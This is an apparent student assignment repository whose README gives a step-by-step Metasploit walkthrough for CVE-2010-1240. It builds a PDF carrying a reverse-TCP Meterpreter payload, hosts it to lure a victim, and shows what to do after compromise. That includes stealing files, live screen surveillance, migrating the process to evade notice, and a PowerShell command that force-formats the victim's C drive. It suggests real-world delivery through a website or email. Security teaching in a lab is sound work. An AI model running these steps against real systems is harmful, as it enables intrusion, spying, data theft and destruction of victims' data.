├── README.md ├── WIC3004Assignment.pdf └── [Bawang Ranger] WIC3004 Group Assignment Presentation Slide_Embedded Backdoor Connection via PDF files.pptx /README.md: -------------------------------------------------------------------------------- 1 | # Embedded Backdoor Connection via PDF Files :smiling_imp: 2 | ***brought to you by***     ![](https://shields.io/badge/Bawang-Ranger-green?style=for-the-badge&logo=CodeIgniter&logoColor=orange) 3 | 4 | 5 | ## Introduction 6 | This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240. 7 | 8 | As soon as the PDF is opened in Adobe Reader, the users who are being tricked by us to agree on the security pop-ups will let us gain meterpreter session connected to their devices via reverse TCP connection. Till that time, all their data and what they're doing right now are under our surveillance. 9 | 10 | ![Hehe~Boi](https://media.giphy.com/media/dPEJxh06y4OTC/giphy.gif) 11 | 12 | ## List of Software/Tools 13 | - Metasploit 14 | - [Adobe Reader <= 8.1.2](http://www.oldversion.com/windows/acrobat-reader/) 15 | 16 | ## Environment 17 | 18 | [![Kali Linux](https://img.shields.io/badge/Kali%20Linux-%3E=%202021.1-005ab3?style=for-the-badge&logo=kali-linux&logoColor=white)](https://www.kali.org/get-kali/#kali-virtual-machines)         19 | [![Windows 7 or 10](https://img.shields.io/badge/Windows-7%20%7C%2010%20-0078D6?style=for-the-badge&logo=windows&logoColor=white)](https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/)         20 | [![Adobe Reader](https://img.shields.io/badge/Adobe%20Reader-%3C=%208.1.2-red?style=for-the-badge&logo=adobe-acrobat-reader&logoColor=white)](http://www.oldversion.com/windows/acrobat-reader-8-1-2)         21 | 22 | - **Attacker Machine**: Kali Linux version 2021.1 23 | - **Target OS**: Windows 10 (x86) or Windows 7 (x86) 24 | - **Target Software**: Adobe Reader 8.1.2 25 | 26 | ## Detailed Steps 27 | First, we launch the MSFconsole which provides command line interface for us to access the Metasploit framework. 28 | ``` 29 | msfconsole 30 | ``` 31 | 32 | Then, search for exploit that matches our target Windows platform and Adobe PDF Reader, where it will display a whole list of exploits that can used to hijack into the victim’s Windows machine and exploits the Adobe PDF Reader vulnerabilities. 33 | ``` 34 | search type:exploit platform:windows adobe pdf 35 | ``` 36 | 37 | In this exploitation, we select and use the module "adobe_pdf_embedded_exe" by using the command below to achieve the target of hijacking the victim. 38 | ``` 39 | use exploit/windows/fileformat/adobe_pdf_embedded_exe 40 | ``` 41 | 42 | We can also check the information of the exploit by using the “info” command as shown below: 43 | ``` 44 | info 45 | ``` 46 | 47 | Then, we set the payload to use reverse TCP connection. We also use the Meterpreter that provides an interactive shell which ease us to use all kinds of functions by insert and execute the code to explore the victim’s machine. 48 | ``` 49 | set payload windows/meterpreter/reverse_tcp 50 | ``` 51 | 52 | Then, we will set for the listening host and port. For LHOST, we need to put in the attacker machine’s IP address, which in this case is our Kali machine’s IP address(10.0.2.4)*. 53 | - **`*p.s.`** 54 | - *You have to use your own Kali machine's IP* 55 | - *You can use a different port number* 56 | 57 | Meanwhile for LPORT, it is up to us to set a port number which is not commonly used. 58 | ``` 59 | # to check Kali machine’s IP address 60 | ifconfig 61 | 62 | set LHOST *10.0.2.4* 63 | set LPORT 5665 64 | ``` 65 | 66 | Then, we will set the input file for the base of the PDF with INFILENAME* flag. Next, we will set the filename to something that will attract victim’s interest to open the malicious PDF file. 67 | - **`*p.s.`** 68 | - *You have to make sure your PDF file path* 69 | - *You can use a different filename* 70 | ``` 71 | set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf' 72 | set FILENAME 'Bawang_Ranger_WIC3004Report.pdf' 73 | ``` 74 | 75 | We can view our options again before we enter “exploit” command to generate the payload together with PDF. 76 | ``` 77 | # Then we can show the info or options by 78 | show info | show options 79 | 80 | exploit 81 | ``` 82 | 83 | Once we done generated the PDF file, we will move the file to /var/www/html which is the directory of our Kali machine’s to host the web application server for our victim to download the PDF file later. 84 | - **`Note:`** 85 | - *If you have set a different filename, make sure you copy the right path instead!* 86 | ``` 87 | sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html 88 | ``` 89 | 90 | Then, to set up our listener, we will make use of "exploit/multi/handler". Again, we will set the payload, LHOST, LPORT aligned with what we have defined in generating the malicious PDF file. Then we will run the payload. 91 | - **`Note:`** 92 | - *LHOST: Please note for your own Kali machine's IP address* 93 | - *LPORT: If you have set a different port number, make sure you type in the number correctly* 94 | - `show info` or `show options` is optional command to run. 95 | - Run it is just for verifying what you have set just now 96 | ``` 97 | use exploit/multi/handler 98 | set payload windows/meterpreter/reverse_tcp 99 | set LHOST 10.0.2.4 100 | set LPORT 5665 101 | [show info | show options] 102 | run 103 | ``` 104 | 105 | In another terminal, we check the status of the Apache server to ensure it is running to host our PDF file in /var/www/html for the victim to download the file. 106 | ``` 107 | service apache2 status 108 | 109 | # If it is inactive, start the service 110 | service apache2 start 111 | ``` 112 | --- 113 | On the Windows machine, open any browser such as Chrome browser and type in our Kali's IP (10.0.2.4)* to access the web application server of the Kali machine. 114 | 115 | **`*Note:`** *Please note for your own Kali machine's IP address* 116 | 117 | Then, mimic an user save the intended PDF file. 118 | 119 | Once the file is opened by victim in Adobe Reader 8.1.2 with accepting to the prompt security messages, we then can observe on our Kali machine that we have a new session connected via reverse TCP connection. 120 | 121 | **In real word scenario,** we will set up a website with the embedded-payload PDF to let victim download or attach the file via email. 122 | 123 | --- 124 | 125 | ## Result of the exploitation 126 | 127 | Then, we can remotely access to the victim’s machine and then further performing more malicious behaviours that we wanted in the meterpreter session. 128 | 129 | ### To show a list of things that we can do 130 | ``` 131 | help 132 | ``` 133 | ### List current directory 134 | ``` 135 | pwd 136 | ``` 137 | ### List the file on that directory 138 | ``` 139 | ls 140 | ``` 141 | ### Download folder or file from victim machine 142 | For example, there's a file named `password.txt`, we can issue `download password.txt` command 143 | ``` 144 | download [folder name | filename with extension] 145 | ``` 146 | ### Create file on victim machine 147 | Of course, we can write malicious script (implanting backdoor) to keep us connecting to the Windows machine if we're really evil! :skull: 148 | ``` 149 | # Boot command prompt at background 150 | execute -f cmd.exe -H -i 151 | 152 | # Create file on Windows 153 | echo "You have been hacked" > hack.txt 154 | ``` 155 | ### Interact with Windows 156 | ``` 157 | #open the txt file we have just created 158 | hack.txt 159 | 160 | # Take screenshot 161 | screenshot 162 | 163 | # Watch the remote user in real time 164 | screenshare 165 | ``` 166 | ### Additional 167 | However, the attacker can reduce the suspicion by migrating the meterpreter process to a different one by using the migrate module in the meterpreter session. 168 | ``` 169 | meterpreter> run post/windows/manage/migrate 170 | ``` 171 | Here, it will automatically spawn a new process in the victim’s machine to migrate itself to. The victim would then be able to delete the infected PDF file, completely unaware that the process has already went elsewhere. 172 | 173 | The attacker can further create malicious script on the target machine using command prompt (cmd) or PowerShell which is able to bring down the whole operating system to not function properly. 174 | ``` 175 | meterpreter> shell 176 | ``` 177 | ``` 178 | # Start the Windows PowerShell 179 | powershell 180 | 181 | #Powershell command to forcefully format the C drive clean. 182 | New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false 183 | ``` 184 | 185 | ## Demonstration Video 186 | 187 | [![Demo](https://i.imgur.com/FG8Ftvg.jpg)](https://youtu.be/TJkEAZb7-so "[Demonstration] Embedded Backdoor Connection via PDF Files | Bawang Ranger") 188 | 189 | 190 | [//]: # (https://shields.io/badge/Chan-%20Jia%20Liang-green?style=for-the-badge&logo=CodeIgniter&logoColor=orange) 191 | [//]: # (https://img.shields.io/badge/YouTube-FF0000?style=for-the-badge&logo=youtube&logoColor=white) 192 | -------------------------------------------------------------------------------- /WIC3004Assignment.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Jasmoon99/Embedded-PDF/bbe9d670583ca53d12de1a8818957cbe63019964/WIC3004Assignment.pdf -------------------------------------------------------------------------------- /[Bawang Ranger] WIC3004 Group Assignment Presentation Slide_Embedded Backdoor Connection via PDF files.pptx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Jasmoon99/Embedded-PDF/bbe9d670583ca53d12de1a8818957cbe63019964/[Bawang Ranger] WIC3004 Group Assignment Presentation Slide_Embedded Backdoor Connection via PDF files.pptx --------------------------------------------------------------------------------